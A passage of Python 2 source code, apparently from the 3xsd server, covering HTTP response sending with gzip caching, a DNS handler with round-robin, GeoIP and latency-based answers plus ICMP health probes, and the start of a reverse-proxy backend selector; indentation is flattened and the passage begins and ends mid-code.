self.server.gzip_shelf[self.xcache_key] = [self.out_body_size, _out_head_s, _ss, len(_ss), self.out_body_file_lmt, self.out_body_size, True, self.gzip_chunked]
#moved to self.server.check_3ws()
#if hasattr(self.server.gzip_shelf.dict, 'sync'):
# with self.server.gzip_shelf_lock:
# self.server.gzip_shelf.dict.sync()
except:
pass #zzz
if len(self.server.xcache) > self.xcache_size:
self.server.xcache.popitem()
#put xcache item, every item take about 8+300+8+8+8+8+1=340 bytes
#3 items per 1KB mem, 3k items per 1MB mem, 3M items per 1GB mem
self.server.xcache[self.xcache_key] = [self.xcache_ttl + _t, self.out_head_s, self.out_body_file, self.out_body_size, self.out_body_file_lmt, self.out_body_mmap, self.canbe_gzipped]
if self.gzip_transfer:
_org_file = self.server.xcache[self.xcache_key][2]
_org_size = self.server.xcache[self.xcache_key][3]
self.out_head_s = self.server.gzip_shelf[self.xcache_key][1]
self.out_body_file = self.server.gzip_shelf[self.xcache_key][2]
self.out_body_size = self.server.gzip_shelf[self.xcache_key][3]
_file_lmt = self.server.gzip_shelf[self.xcache_key][4]
_gzip_pos = self.server.gzip_shelf[self.xcache_key][5]
self.gzip_finished = self.server.gzip_shelf[self.xcache_key][6]
self.gzip_chunked = self.server.gzip_shelf[self.xcache_key][7]
elif self.resp_code >= self.HTTP_BAD_REQUEST:
self.out_head_s = ''.join([self.out_head_s, "Content-Length: ", str(len(self.resp_msg) + 4), '\n'])
#send headers & body
if self.has_resp_body and self.out_body_file and self.cmd_get == 1:
if self.out_body_mmap:
if self.server_pipelining:
if self.sock_fileno in self.server.x_reqs:
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 1)
self.send_out_all_headers(extra=self.out_body_mmap[:])
if self.sock_fileno not in self.server.x_reqs:
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 0)
else:
self.send_out_all_headers(extra=self.out_body_mmap[:])
elif isinstance(self.out_body_file, str) and self.out_body_size < 1000 and self.gzip_finished:
self.send_out_all_headers(extra=self.out_body_file)
else:
#Try send as much as data once in a TCP packet
#Because 2(1 header + 1 body) packets turn down performance up to 50% than 1(header + body) packet
if self.resume_transfer == 0:
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 1)
self.send_out_all_headers()
if self.out_body_size - sent >= self.send_buf_size:
if self._native_epoll:
_send_buf = self.send_buf_size
else:
_send_buf = self.out_body_size
else:
_send_buf = self.out_body_size - sent
try:
if isinstance(self.out_body_file, str):
_sent = self.sock.send(self.out_body_file[sent:_send_buf+sent])
else:
_sent = sendfile.sendfile(self.sock_fileno, self.out_body_file.fileno(),
sent, _send_buf)
sent += _sent
if self.resume_transfer == 0:
#after transfer snd_buf data, requeue event, let other event to be handled
if sent < self.out_body_size or not self.gzip_finished:
self.server.resume[self.sock_fileno] = [self.out_body_file,
self.out_body_size, sent, self.keep_connection,
self.gzip_transfer, self.xcache_key]
self.server.epoll.modify(self.sock_fileno, select.EPOLLOUT)
self.transfer_completed = 0
else:
if self.out_body_size == sent and self.gzip_finished:
self.server.resume.pop(self.sock_fileno)
self.server.epoll.modify(self.sock_fileno, select.EPOLLIN)
self.transfer_completed = 1
else:
self.server.resume[self.sock_fileno] = [self.out_body_file,
self.out_body_size, sent, self.keep_connection,
self.gzip_transfer, self.xcache_key]
except OSError as e: #rrr
if e.errno == errno.EAGAIN:
#send buffer full?just wait to resume transfer
#and gevent mode can't reach here, beacause gevent_sendfile intercepted the exception
self.server.resume[self.sock_fileno] = [self.out_body_file,
self.out_body_size, sent, self.keep_connection,
self.gzip_transfer, self.xcache_key]
elif e.errno == errno.EPIPE:
#peer closed connection
self.transfer_completed = 1
self.server.resume.pop(self.sock_fileno)
self.server.cleanup(self.sock_fileno);
else:
raise
if not self.gzip_finished:
#continue gen gzip chunked encoding file data, zzz
_gzf = self.server._gzs.get(self.xcache_key)
if not _gzf:
#this wrong, may cause error, just in case
_gzf = zlib.compressobj(6,
zlib.DEFLATED,
zlib.MAX_WBITS | 16,
zlib.DEF_MEM_LEVEL,
0)
if _org_size > _gzip_pos + self.send_buf_size/2:
_z_buf_size = self.send_buf_size/2
_flush_mode = zlib.Z_SYNC_FLUSH
else:
_z_buf_size = _org_size - _gzip_pos
self.gzip_finished = True
_flush_mode = zlib.Z_FINISH
_org_file.seek(_gzip_pos)
_ss = _gzf.compress(_org_file.read(_z_buf_size))
_ss = ''.join([_ss, _gzf.flush(_flush_mode)])
_sss = ''.join([self.out_body_file, hex(len(_ss))[2:], '\r\n', _ss, '\r\n'])
if self.gzip_finished:
_sss = ''.join([_sss, '0\r\n\r\n'])
self.server._gzs.pop(self.xcache_key)
with self.server.gzip_shelf_lock:
self.server.gzip_shelf[self.xcache_key] = [_org_size, self.out_head_s, _sss, len(_sss), _file_lmt, _gzip_pos + _z_buf_size, self.gzip_finished, self.gzip_chunked]
#moved to self.server.check_3ws()
#if hasattr(self.server.gzip_shelf.dict, 'sync'):
# self.server.gzip_shelf.dict.sync()
#Now, transfer complete, resume nature behavior of TCP/IP stack, as turned before
if self.keep_connection == 1 and self.resume_transfer == 0:
#no need to set TCP_CORK when keep_connection=0
#it will be cleared when socket closing and data will be flushed
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 0)
elif self.resp_code == self.HTTP_NOT_MODIFIED:
self.send_out_all_headers()
elif self.resp_code == self.HTTP_OK and self.cmd_head == 1:
self.send_out_all_headers()
elif self.resp_code >= self.HTTP_BAD_REQUEST or self.resp_code == 201 or self.resp_code == 204:
self.send_out_all_headers(extra = "%d %s" % (self.resp_code, self.resp_msg))
def clean(self):
if self.transfer_completed == 1:
self.in_headers.clear()
self.out_headers.clear()
if self.keep_connection == 0:
self.sock.close()
def gevent_sendfile(out_fd, in_fd, offset, count):
#This function is borrowed from gevent's example code, thanks!
sent = 0
while sent < count:
try:
_sent = o_sendfile(out_fd, in_fd, offset + sent, count - sent)
sent += _sent
except OSError as ex:
if ex.args[0] == errno.EAGAIN:
gevent.socket.wait_write(out_fd)
else:
raise
return sent
class _xDNSHandler:
PARSE_OK = 0
PARSE_ERROR = -1
xR_OK = 0
xR_ERR_PARSE = -1
xR_ERR_HANDLE = -2
xResult = 0
sock = None
data = None
addr = None
rra = {}
rrn = {}
ttl = {}
stat = {}
geo = {}
_rra = None
_ttl = None
q = None
query_name = None
query_name_geo = None
answer = None
xcache_ttl = 10
probe_interval = 10 #icmp probe interval in seconds, see if the ip alive
LR_LEFT = 0
LR_RIGHT = 1
lr_peers = {}
lr_ttl = 3600
lr_left = ''
lr_right = ''
lr_range = ''
lr_range_suffix = ''
lr_prefix = 'lr'
lr_resolve = False
lr_left_measuring = False
lr_right_measuring = False
geoip_db = None
def __init__(self, conn, client_address, server, config_section='3nsd'):
self.server = server
#if server.workers > 1:
# self._wlock = multiprocessing.Lock()
#else:
# self._wlock = Semaphore()
self.init_nsd_config(config_section=config_section)
def init_nsd_config(self, config_section='3nsd'):
#for reload config
self.ttl = {}
self.rra = {}
self.rrn = {}
self.geo = {}
self.lr_peers = {}
self.lr_ttl = 3600
self.lr_left = ''
self.lr_right = ''
self.lr_range = ''
self.lr_range_suffix = ''
self.lr_prefix = 'lr'
self.lr_resolve = False
self.lr_left_measuring = False
self.lr_right_measuring = False
self.geoip_db = None
self.config = ConfigParser.ConfigParser()
if not self.config.read('3xsd.conf'):
self.config.read('/etc/3xsd.conf')
for name, value in self.config.items(config_section):
if name == "left":
if value:
self.lr_left = value.lower().strip()
elif name == "right":
if value:
self.lr_right = value.lower().strip()
elif name == "range":
if value:
self.lr_range = value.lower().strip()
elif name == "range_suffix":
if value:
self.lr_range_suffix = value.lower().strip()
elif name == "lr_ttl":
if value:
self.lr_ttl = int(value)
elif name == "lr_prefix":
if value:
self.lr_prefix = value.lower().strip()
elif name == "geoip_db":
if value:
self.geoip_db = geoip2.database.Reader(value)
else:
v = value.split(',', 1)
if len(v) > 1:
# [ttl, ip, ...]
if '@' in name:
_name, _geo = name.lower().split('@')
if _name not in self.geo:
self.geo[_name] = {}
for _cc in _geo.split('/'):
if _cc:
self.geo[_name][_cc] = name
self.ttl[name] = int(v[0])
self.rra[name] = self.ip_list(name, v[1], config_section)
self.rrn[name] = 0
def ip_list(self, name, ipstr, config_section):
#ip,ip,ip... can be the following format: #lll
#10.23.4.11 - single ip, 10.23.4.101-200 - multi ip
a = ipstr.split(',')
iplist = []
t = time.time()
for item in a:
if item.find('-') < 0:
iplist.append(item)
self.stat[item] = [True, self.ttl[name], t] #[stat, ttl, last-check-time]
else:
_ip = item.split('.')
if config_section == '3nsd':
_port = None
_last = _ip[3].split('-')
elif config_section == '3zsd' or config_section == '3fsd':
#10.23.4.101-200:8000
__l = _ip[3].split(':')
_port = __l[1]
_last = __l[0].split('-')
for i in range(int(_last[0]), int(_last[1])+1):
ip = '.'.join([_ip[0], _ip[1], _ip[2], str(i)])
if _port:
ip = ''.join([ip, ':', _port])
iplist.append(ip)
self.stat[ip] = [True, self.ttl[name], t]
if len(iplist) > 0:
return iplist
else:
self.stat.clear()
return None
def init_dns_handler(self):
self.data = None
self.addr = None
self._rra = None
self._ttl = None
self.q = None
self.query_name = None
self.query_name_geo = None
self.answer = None
def __call__(self, events):
#found that one event can contains multi dns query packages, so use while loop instead of for
while 1:
try:
self.data, self.addr = self.sock.recvfrom(1024)
if self.x_parse_query() == self.PARSE_OK:
if not self.lr_resolve:
self.x_gen_answer()
else:
self.x_lr_resolve()
self.x_send_out()
else:
self.xResult = self.xR_ERR_PARSE
except socket.error as e:
if e.errno == errno.EAGAIN:
self.init_dns_handler()
break
else:
raise
def shift(self, alist, n):
if len(alist) == 1:
return alist
else:
_n = n % len(alist)
return alist[_n:] + alist[:_n]
def x_check_range_resolve(self):
#check if it's a left-right range resolving name
self.lr_resolve = self.lr_left_measuring = self.lr_right_measuring = False
if self.lr_range_suffix in self.query_name[0-len(self.lr_range_suffix):] and self._rra and self._rra[0] == '0.0.0.0':
self.lr_resolve = True
if self.lr_left in self.query_name[0-len(self.lr_left):] and self.lr_prefix in self.query_name[:len(self.lr_prefix)]:
self.lr_resolve = True
self.lr_left_measuring = True
if self.lr_right in self.query_name[0-len(self.lr_right):] and self.lr_prefix in self.query_name[:len(self.lr_prefix)]:
self.lr_resolve = True
self.lr_right_measuring = True
if self.lr_resolve:
_peer, _ = self.addr
if _peer not in self.lr_peers:
self.lr_peers[_peer] = [int(time.time()) + self.lr_ttl, 0, 0] #[ttl, left-rtt,right-rtt], also as [ttl, a,b]
return self.lr_resolve
def x_check_peer_geo(self): #cpcp
if self.geoip_db:
try:
_rs = self.geoip_db.country(self.addr[0])
_cc = None
#the country code(_cc), first match continent code, then country's iso_code
if hasattr(_rs.continent, "code"):
_cc = _rs.continent.code.lower()
if _cc in self.geo[self.query_name]:
self.query_name_geo = self.geo[self.query_name][_cc]
if hasattr(_rs.country, "iso_code"):
_cc = _rs.country.iso_code.lower()
if _cc in self.geo[self.query_name]:
self.query_name_geo = self.geo[self.query_name][_cc]
#city has not iso_code, so what's next?
#if hasattr(_rs.city, "iso_code"):
# print "peer city code:", _rs.city.iso_code
#elif hasattr(_rs.city, "name"):
# print "peer city name:", _rs.city.name
print "peer:", self.addr[0], "geo:", self.query_name_geo, "cc:", _cc
except:
pass
def x_parse_query(self): #pqpq
self.q = dpkt.dns.DNS(self.data)
#we accept just A type query
if self.q.qd[0].cls != dpkt.dns.DNS_IN or self.q.qd[0].type != dpkt.dns.DNS_A:
return self.PARSE_ERROR
self.query_name = self.query_name_geo = self.q.qd[0].name
if self.query_name in self.geo:
self.x_check_peer_geo()
self._rra = self.rra.get(self.query_name_geo)
self._ttl = self.ttl.get(self.query_name_geo)
else:
self._rra = self.rra.get(self.query_name)
self._ttl = self.ttl.get(self.query_name)
if self.x_check_range_resolve():
#It's a left-right range resolve
return self.PARSE_OK
elif self._rra is not None and self._ttl is not None:
#ok, rr & ttl config found
return self.PARSE_OK
else:
#not my serving domain name
return self.PARSE_ERROR
def x_lr_resolve(self): #lrlr
_peer = self.addr[0]
_ttl, a, b = self.lr_peers[_peer]
_t = time.time() #_t: current time
#print "---------------------"
#print _peer, self.lr_peers[_peer]
if _t <= _ttl:
#cache of a,b not expired
if a > 0 and b > 0:
self.x_lr_range(a, b, ch=True) #ch = cache hit
return
else:
#cache of a,b expired
_ttl = int(_t) + self.lr_ttl
a = b = 0
self.lr_peers[_peer] = [_ttl, a, b]
if self.lr_left_measuring:
#doing left measure
_speer0, _sts0, _sts1, _sts2 = self.query_name.split('.')[0].split('-')[1:]
_ts0, _ts1, _ts2 = (int(_sts0), int(_sts1), int(_sts2))
_peer0 = socket.inet_ntoa(struct.pack('!I', int(_speer0)))
if _peer0 not in self.lr_peers:
self.lr_peers[_peer0] = [int(_t) + self.lr_ttl, 0, 0]
if _ts2 > 0:
b = self.lr_peers[_peer][2] = self.lr_peers[_peer0][2] = _ts2
if a == 0:
if _ts1 == 0:
self.x_lr_cname(self.LR_LEFT, _ts0, int((_t - _ts0) * 1000), _ts2)
return
else:
a = self.lr_peers[_peer][1] = self.lr_peers[_peer0][1] = int((_t - _ts0) * 1000) - _ts1 if _ts1>300000 else _ts1
if b == 0:
self.x_lr_cname(self.LR_RIGHT, _ts0, a, 0)
elif a > 0 and b > 0:
if a < _ts1:
#for debug purpose
self.x_lr_cname(self.LR_LEFT, _ts0, a, b)
else:
self.x_lr_range(a, b)
elif self.lr_right_measuring:
#doing right measure
_speer0, _sts0, _sts1, _sts2 = self.query_name.split('.')[0].split('-')[1:]
_ts0, _ts1, _ts2 = (int(_sts0), int(_sts1), int(_sts2))
_peer0 = socket.inet_ntoa(struct.pack('!I', int(_speer0)))
if _peer0 not in self.lr_peers:
self.lr_peers[_peer0] = [int(_t) + self.lr_ttl, 0, 0]
if _ts1 > 0:
a = self.lr_peers[_peer][1] = self.lr_peers[_peer0][1] = _ts1
if b == 0:
if _ts2 == 0:
self.x_lr_cname(self.LR_RIGHT, _ts0, _ts1, int((_t - _ts0) * 1000))
return
else:
b = self.lr_peers[_peer][2] = self.lr_peers[_peer0][2] = int((_t - _ts0) * 1000) - _ts2 if _ts2>300000 else _ts2
if a == 0:
self.x_lr_cname(self.LR_LEFT, _ts0, 0, b)
elif a > 0 and b > 0:
if b < _ts2:
#for debug purpose
self.x_lr_cname(self.LR_RIGHT, _ts0, a, b)
else:
self.x_lr_range(a, b)
else:
#doing initial query
#_ts0: base time stamp, in secs
_ts0 = int(_t - 300)
#_ts: offset time stamp from base time, in msecs
_ts = int((_t - _ts0) * 1000)
if self.lr_range == 'left':
#left
if a == 0 and b == 0:
if _ts0 % 2:
self.x_lr_cname(self.LR_LEFT, _ts0, _ts)
else:
self.x_lr_cname(self.LR_RIGHT, _ts0, 0, 0)
elif a == 0: #b > 0
self.x_lr_cname(self.LR_LEFT, _ts0, _ts, b)
elif b == 0: #a > 0
self.x_lr_cname(self.LR_RIGHT, _ts0, a, 0)
else: #a > 0, b > 0
self.x_lr_range(a, b, ch=True)
else:
#right
if a == 0 and b == 0:
if _ts0 % 2:
self.x_lr_cname(self.LR_RIGHT, _ts0, 0, _ts)
else:
self.x_lr_cname(self.LR_LEFT, _ts0, 0, 0)
elif b == 0: #a > 0
self.x_lr_cname(self.LR_RIGHT, _ts0, a, _ts)
elif a == 0: #b > 0
self.x_lr_cname(self.LR_LEFT, _ts0, 0, b)
else: #a > 0, b > 0
self.x_lr_range(a, b, ch=True)
def x_lr_range(self, a, b, ch=False): #lrlr
if self.lr_left_measuring:
_cname = self.query_name[self.query_name.find('.')+1:]
if a > b:
_cname = _cname.replace(self.lr_left, self.lr_right)
elif self.lr_right_measuring:
_cname = self.query_name[self.query_name.find('.')+1:]
if a < b:
_cname = _cname.replace(self.lr_right, self.lr_left)
else:
if self.lr_range == 'left':
_cname = self.query_name.replace(self.lr_range_suffix, self.lr_left)
elif self.lr_range == 'right':
_cname = self.query_name.replace(self.lr_range_suffix, self.lr_right)
#gen cname answer
self.q.op = dpkt.dns.DNS_RA
self.q.rcode = dpkt.dns.DNS_RCODE_NOERR
self.q.qr = dpkt.dns.DNS_R
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_CNAME
arr.name = self.query_name
arr.cname = _cname
arr.ttl = 0 if not ch else self.ttl.get(_cname, 0)
self.q.an.append(arr)
#I haven't understand what the Authority Record is going on..
if self.q.ar: del self.q.ar[:]
self.answer = str(self.q)
def x_lr_cname(self, _range, ts0, ts1, ts2=0): #lrlr
#query_name: ga.i.3xsd.net
#cname: ts0-ts1-ts2.ga.l.3xsd.net
#ts0: base time, in secs
#ts1: a measure time start point if ts2 = 0, or rtt of a if ts2 > 0, in msecs from base time
#ts2: b measure time start point if ts3 = 0, or rtt of b if ts3 > 0, in msecs from base time
if self.lr_right_measuring or self.lr_left_measuring:
_query_name = self.query_name[self.query_name.find('.')+1:]
else:
_query_name = self.query_name
if _range == self.LR_LEFT:
if self.lr_right_measuring:
_query_name = _query_name.replace(self.lr_right, self.lr_left)
else:
_query_name = _query_name.replace(self.lr_range_suffix, self.lr_left)
elif _range == self.LR_RIGHT:
if self.lr_left_measuring:
_query_name = _query_name.replace(self.lr_left, self.lr_right)
else:
_query_name = _query_name.replace(self.lr_range_suffix, self.lr_right)
#[prefix, peer_ip, ts0, ts1, ts2]
_cname = ''.join([self.lr_prefix, '-', str(struct.unpack('!I', socket.inet_aton(self.addr[0]))[0]), '-', str(ts0), '-', str(ts1), '-', str(ts2), '.', _query_name])
#gen cname answer
self.q.op = dpkt.dns.DNS_RA
self.q.rcode = dpkt.dns.DNS_RCODE_NOERR
self.q.qr = dpkt.dns.DNS_R
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_CNAME
arr.name = self.query_name
arr.cname = _cname
arr.ttl = 0
self.q.an.append(arr)
#I haven't understand what the Authority Record is going on..
if self.q.ar: del self.q.ar[:]
self.answer = str(self.q)
def x_gen_answer(self): #gaga
if self.query_name_geo in self.server.xcache:
_c = self.server.xcache.get(self.query_name_geo)
if _c[0] > time.time():
#cache item not expired, load it and rewrite the id field of answer to match queryer's
if self.q.id < 255:
self.answer = ''.join(['\x00', chr(self.q.id), _c[1][2:]])
else:
self.answer = ''.join([chr(self.q.id/256), chr(self.q.id % 256), _c[1][2:]])
return
else:
#expired, clear it
self.server.xcache.pop(self.query_name_geo)
#cache not hit, go on handling: first to turn query into answer
self.q.op = dpkt.dns.DNS_RA
self.q.rcode = dpkt.dns.DNS_RCODE_NOERR
self.q.qr = dpkt.dns.DNS_R
_alive = 0
#if not a geo resolving, self.query_name_geo is just equal to self.query_name, set by x_parse_query()
_query_name = self.query_name_geo
#for round robbin, shift ip list every time
self._rra = self.shift(self.rra.get(_query_name), self.rrn.get(_query_name))
self.rrn[_query_name] = (self.rrn[_query_name] + 1) % len(self.rra.get(_query_name))
#gen rr records for A resolve
while _alive == 0:
for _ip_s in self._rra:
#append rr record with ip not down
__stat = self.stat.get(_ip_s)
_stat = __stat[0]
if not _stat:
continue
else:
_alive += 1
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = self.query_name
arr.ip = socket.inet_aton(_ip_s)
arr.ttl = self._ttl
self.q.an.append(arr)
if _alive == 0:
#all ip go down, failover to backup config
_query_name = ''.join(['_', _query_name])
if self.rra.get(_query_name) is None:
break #backup go down too, just break and return empty answer
self._rra = self.shift(self.rra.get(_query_name), self.rrn.get(_query_name))
self.rrn[_query_name] += 1
self._ttl = self.ttl.get(_query_name)
#I haven't understand what the Authority Record is going on..
if self.q.ar: del self.q.ar[:]
self.answer = str(self.q)
#cache it, when expired at one ttl
self.server.xcache[self.query_name_geo] = [self.xcache_ttl + time.time(), self.answer]
def x_send_out(self):
#self._wlock.acquire()
try:
#send out answer, seems sending without mutex lock is ok
self.sock.sendto(self.answer, self.addr)
except:
raise
#finally:
#self._wlock.release()
def probe_ips(self):
gs = []
while 1:
gevent.sleep(self.probe_interval)
if len(self.stat) > 0:
if len(gs) > 0:
del gs[:]
for ip in self.stat.keys():
if ip == '0.0.0.0': continue
if time.time() > self.stat[ip][2] + self.stat[ip][1]: #last-check + ttl
gs.append(gevent.spawn(self.icmp_ping, ip)) #do works concurrently
gevent.joinall(gs)
#print "lr_peers:", self.lr_peers
#print "-------------------"
#print "self.rra: ", self.rra
#print "self.geo: ", self.geo
def icmp_ping(self, ip):
#be sure to be a gevent.socket, for concurrent reason
sock = gevent.socket.socket(gevent.socket.AF_INET, gevent.socket.SOCK_RAW, 1) #raw socket requiries root privilege
if StrictVersion(gevent.__version__) >= StrictVersion('1.0'):
sock.connect((ip, None))
else:
sock.connect((ip, 1))
sock.settimeout(1)
rcvd = 0
for i in xrange(2): #send icmp ping tests
icmp = dpkt.icmp.ICMP(type=8, data=dpkt.icmp.ICMP.Echo(id=random.randint(0, 0xffff),
seq=i, data='3nsd probe'))
try:
sock.send(str(icmp))
r = sock.recv(1024)
rip = dpkt.ip.IP(r)
if gevent.socket.inet_ntoa(rip.src) == ip:
ricmp = dpkt.icmp.ICMP(str(rip.data))
if ricmp.type == 0:
rcvd += 1
except gevent.socket.timeout:
pass
if rcvd > 0:
break
sock.close()
self.stat[ip][2] = time.time()
if rcvd == 0: #ip down
self.stat[ip][0] = False
return False
else: #ip alive
self.stat[ip][0] = True
return True
class _xZHandler(_xHandler, _xDNSHandler):
Z_RR = 0 #round robin
Z_IP = 1 #ip hash
Z_URL = 2 #url hash
None2 = [None, None]
_f = None #socket fileno
z_cache_size = 1000 #limit the xcache size in mem, about 30MB size with average file size 30KB
z_idle_ttl = 20 #backend connections have a idle timeout of 20 seconds
z_xcache_shelf = False #persistent storage of xcache
z_shelf_size = 1000000 #1 million files on-disk cache, about 30GB disk size with average file size 30KB
transparent_proxy = False
tp_host = {}
def __init__(self, conn, client_address, server, native_epoll=True,
gevent_stream=False, recv_buf_size=16384, send_buf_size=65536, z_mode=0):
_xHandler.__init__(self, conn, client_address, server, native_epoll, gevent_stream, recv_buf_size, send_buf_size)
self.server_pipelining = False
if Z_mode > z_mode:
z_mode = Z_mode
if z_mode >= 0:
_xDNSHandler.__init__(self, conn, client_address, server, config_section='3zsd')
if '*' in self.rra.keys():
self.transparent_proxy = True
self.z_mode = z_mode
else:
self.z_mode = 0
if X_shelf == 1:
self.z_xcache_shelf = True
self.server.xcache_shelf = shelve.open('shelf.xcache', writeback=True)
self.server.xcache_shelf_lock = multiprocessing.Lock()
def init_zsd_config(self, config_section='3zsd'):
_xHandler.init_config(self)
_xDNSHandler.init_nsd_config(self, config_section=config_section)
if '*' in self.rra.keys():
self.transparent_proxy = True
def init_handler(self, conn, client_address, rw_mode=0):
_xHandler.init_handler(self, conn, client_address, rw_mode)
self.z_hostname = self.z_backends = self.z_host_addr = self.z_host_sock = None
self.z_header_length = self.z_finished = self.z_body_size = self.chuncked_encoding = self.transfer_completed = 0
self.response_headers_parsed = False
if conn:
if self._f in self.server.xcache_stat:
self.xcache_hit = True
self.xcache_key = self.server.xcache_stat[self._f]
if rw_mode > 0:
_n = conn.fileno()
if _n in self.server.k_conns:
self.r_http_ver, self.keep_connection = self.server.k_conns[_n]
self.path = self.server.c_path.get(_n)
self.z_hostname = self.server.zhosts.get(_n)
self._r = self.server.z_reqs.get(_n)
if rw_mode > 1:
self.z_host_sock = self.server.zconns.get(self._f)
self.z_host_addr = self.server.zaddrs.get(self._f)
else:
return
def z_check_xcache(self, _f):
if self.if_modified_since == 0 and self.in_headers.get("Cache-Control", "null").find("no-cache") < 0:
_key_found = _in_shelf = False
self.accept_encoding = self.in_headers.get("Accept-Encoding")
if self.accept_encoding:
for x in self.accept_encoding.replace(' ','').split(','):
_key = ''.join([x, ':', self.xcache_key])
if _key in self.server.xcache:
_key_found = True
self.xcache_key = _key
break
elif self.z_xcache_shelf and _key in self.server.xcache_shelf:
_key_found = True
_in_shelf = True
self.xcache_key = _key
break
if not _key_found:
if self.xcache_key in self.server.xcache:
_key_found = True
elif self.z_xcache_shelf and self.xcache_key in self.server.xcache_shelf:
_key_found = True
_in_shelf = True
if _key_found:
if not _in_shelf:
self._c = self.server.xcache.get(self.xcache_key)
else:
self._c = self.server.xcache[self.xcache_key] = self.server.xcache_shelf.get(self.xcache_key)
ttl = self._c[0]
if ttl >= time.time():
#cache hit
self.out_head_s, self.out_body_file, self.out_body_size, self.out_body_file_lmt, self.out_body_mmap = self._c[1:]
self.has_resp_body = True
self.xcache_hit = True
self.server.xcache_stat[_f] = self.xcache_key
if self.r_http_ver == self.HTTP11:
self.resp_line = 'HTTP/1.1 200 OK'
else:
self.resp_line = 'HTTP/1.0 200 OK'
return
else:
#cache item expired
self._c = None
if not _in_shelf:
self.server.xcache.pop(self.xcache_key)
else:
try:
del self.server.xcache_shelf[self.xcache_key]
except:
#may be problem in concurrent mode
pass
if _f in self.server.xcache_stat:
self.server.xcache_stat.pop(_f)
self.xcache_hit =False
else:
self.xcache_hit =False
def __call__(self, fds):
for f, rw_mode in fds:
self._f = f
_do_clean = True
if rw_mode == 0: #ccc
#from client, resume_transfer = 0
#print "0 c->s" #client to server
self.init_handler(self.server.conns[f], self.server.addrs[f], rw_mode)
parse_stat = self.x_parse()
if parse_stat == self.PARSE_OK:
self.server.k_conns[f] = [self.r_http_ver, self.keep_connection]
self.server.c_path[f] = self.path
if self.cmd_get == 1 or self.cmd_head == 1:
self.z_check_xcache(self._f)
if self.xcache_hit:
self.x_response()
else:
self.z_GET_init()
if self.xResult < 0:
#something wrong
if self.xResult == self.xR_ERR_5xx:
#backend error
self.x_response()
else:
_do_clean = False
elif self.cmd_put == 1 or self.cmd_delete == 1:
if hasattr(self, "z_PUT_init"):
self.z_PUT_init()
if self.xResult < 0:
if self.xResult == self.xR_ERR_5xx:
self.x_response()
else:
_do_clean = False
else:
self.xResult = self.xR_ERR_HANDLE
else:
self.xResult = self.xR_ERR_HANDLE
elif parse_stat == self.PARSE_AGAIN:
self.xResult = self.xR_PARSE_AGAIN
continue
else:
self.xResult = self.xR_ERR_PARSE
#client may closed connection, clean cb_conns
self.server.cleanc(self._f)
elif rw_mode == 1:
#to client, resume_transfer = 1
#print "1 s->c" #server to client
self.init_handler(self.server.conns[f], self.server.addrs[f], rw_mode)
if self.xcache_hit:
self.x_response()
_cb = self.server.cb_conns.get(f)
if _cb:
_z_sock, _f = _cb
else:
_z_sock, _f = self.None2
if _z_sock:
#print "xcache_hit clean cb_conns pair:", f, _f
self.server.z_reqs_cnt[_f] -= 1
if self.server.z_reqs_cnt[_f] == 0:
#release z_conn & c_conn pair in cb_conns
self.server.cb_conns[_f] = None
self.server.cb_conns[f] = None
#add idle list
if str(self.server.zaddrs[_f]) in self.server.zidles:
if _f not in self.server.zidles[str(self.server.zaddrs[_f])]:
self.server.zidles[str(self.server.zaddrs[_f])].appendleft(_f)
else:
self.server.zidles[str(self.server.zaddrs[_f])] = deque([_f])
self.server.zconns_stat[_f] = [0, time.time()] #conn idle
#clean zcache
self.server.zcache.pop(_f, None)
self.server.zcache_stat.pop(_f, None)
else:
_do_clean = self.z_transfer_client(self._f)
elif rw_mode == 2:
#from backend, resume_transfer = 2
#print "2 b->s" #backend to server
self.init_handler(self.server.zconns[f], self.server.zaddrs[f], rw_mode)
parse_stat = self.z_transfer_backend(self._f)
if parse_stat == self.PARSE_ERROR:
self.server.cleanz(self._f)
elif parse_stat == self.PARSE_AGAIN:
self.z_hostname = self.server.zhosts[self._f]
self.path = self.server.z_path[self._f]
self._r = self.server.z_reqs[self._f]
#print "z_conns", self.server.zconns
#print "cb_conns", self.server.cb_conns
#print "idle_zconn", self.server.zidles
#print f
_do_clean = False
_cb = self.server.cb_conns.get(self._f)
if _cb:
_client_sock, _client_sock_fileno = _cb
else:
_client_sock, _client_sock_fileno = self.None2
if not _client_sock:
self.server.epoll.unregister(f)
self.server.cleanz(self._f)
else:
self.server.cleanz(self._f)
self.z_connect_backend(rw=2, client_sock=_client_sock)
self.z_send_request_init()
elif rw_mode == 3:
#to backend, resume_transfer = 3
#print "3 s->b" #server to backend
self.init_handler(self.server.zconns[f], self.server.zaddrs[f], rw_mode)
_do_clean = self.z_GET_backend()
else:
self.xResult = self.xR_ERR_PARSE
if _do_clean:
self.transfer_completed = 1
self.clean()
def z_parse_address(self, addr):
try:
host, port = addr.split(':', 1)
port = int(port)
except:
#return None
return addr, 80
return host, port
def z_resolve_request_host(self, _hostname):
#self.tp_host[_hostname] = {'ip', 'expire-time'}
#transparent hosts's hostname-ip resolve results
_t = time.time()
_ttl = self.ttl.get('*')
if _hostname in self.tp_host:
if _t > self.tp_host[_hostname]['expire-time']:
#renew ip
self.tp_host[_hostname]['ip'] = socket.gethostbyname(_hostname)
self.tp_host[_hostname]['expire-time'] = _ttl + _t
else:
#new resolve
self.tp_host[_hostname]= {'ip':socket.gethostbyname(_hostname), 'expire-time':_ttl+_t}
return ''.join([self.tp_host[_hostname]['ip'], ':80'])
def z_pick_a_backend(self):
if self.transparent_proxy and self.z_hostname not in self.rra.keys():
z_hostname = '*'
if self.rra['*'][0] == '0.0.0.0:0':
#a special backend 0.0.0.0:0 is defined,
#means that zsd should resolve the request hostname to ip and direct to it
return self.z_resolve_request_host(self.z_hostname)
else:
z_hostname = self.z_hostname
if self.z_mode == self.Z_RR:
self.z_backends = self.shift(self.rra.get(z_hostname), self.rrn.get(z_hostname))
self.rrn[z_hostname] = (self.rrn[z_hostname] + 1) % len(self.rra.get(z_hostname))
return self.z_backends[0]
elif self.z_mode == self.Z_IP:
try:
_ip_peer, _port_peer = self.sock.getpeername()
